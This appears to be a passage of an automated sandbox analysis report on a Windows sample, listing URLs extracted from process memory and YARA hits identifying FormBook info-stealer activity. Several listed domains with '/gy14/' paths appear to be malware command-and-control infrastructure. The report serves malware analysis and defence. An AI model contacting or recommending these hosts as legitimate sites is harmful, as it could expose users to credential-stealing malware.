Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.amiciperlacoda.comReferer:
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.artbydianayorktownva.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.artbydianayorktownva.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.artbydianayorktownva.com/gy14/www.survivordental.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.artbydianayorktownva.comReferer:
Source: explorer.exe, 00000007.00000002.2882270142.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1661162254.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batuoe.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batuoe.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batuoe.com/gy14/www.zezfhys.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batuoe.comReferer:
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dianetion.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dianetion.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dianetion.com/gy14/www.artbydianayorktownva.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dianetion.comReferer:
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.harborspringsfire.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.harborspringsfire.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.harborspringsfire.com/gy14/www.alterdpxlmarketing.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.harborspringsfire.comReferer:
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtdiyx.xyz
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtdiyx.xyz/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtdiyx.xyz/gy14/www.theanhedonia.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mtdiyx.xyzReferer:
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.survivordental.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.survivordental.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.survivordental.com/gy14/www.tulisanemas.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.survivordental.comReferer:
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theanhedonia.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theanhedonia.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theanhedonia.com/gy14/www.harborspringsfire.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.theanhedonia.comReferer:
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tulisanemas.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tulisanemas.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tulisanemas.com/gy14/www.amiciperlacoda.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tulisanemas.comReferer:
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.v72999.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.v72999.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.v72999.com/gy14/www.mtdiyx.xyz
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.v72999.comReferer:
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venitro.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venitro.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venitro.com/gy14/www.batuoe.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.venitro.comReferer:
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yzyz841.xyz
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yzyz841.xyz/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yzyz841.xyz/gy14/www.0854n5.shop
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yzyz841.xyzReferer:
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zezfhys.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zezfhys.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zezfhys.com/gy14/www.zom11.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zezfhys.comReferer:
Source: 22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zom11.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zom11.com/gy14/
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zom11.com/gy14/www.dianetion.com
Source: explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zom11.comReferer:
Source: explorer.exe, 00000007.00000000.1661162254.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000007.00000002.2873939169.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000007.00000002.2873939169.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000007.00000000.1661162254.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000000.1656778904.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000000.1656778904.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000007.00000002.2871901047.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1651619225.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1653114806.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2870031242.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.1656778904.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000007.00000000.1656778904.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.1656778904.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000007.00000002.2873939169.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000007.00000002.2873939169.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000007.00000000.1661162254.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000007.00000002.2873939169.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000007.00000000.1661162254.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000007.00000000.1661162254.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.2882270142.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1661162254.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000007.00000000.1661162254.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000007.00000002.2873939169.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
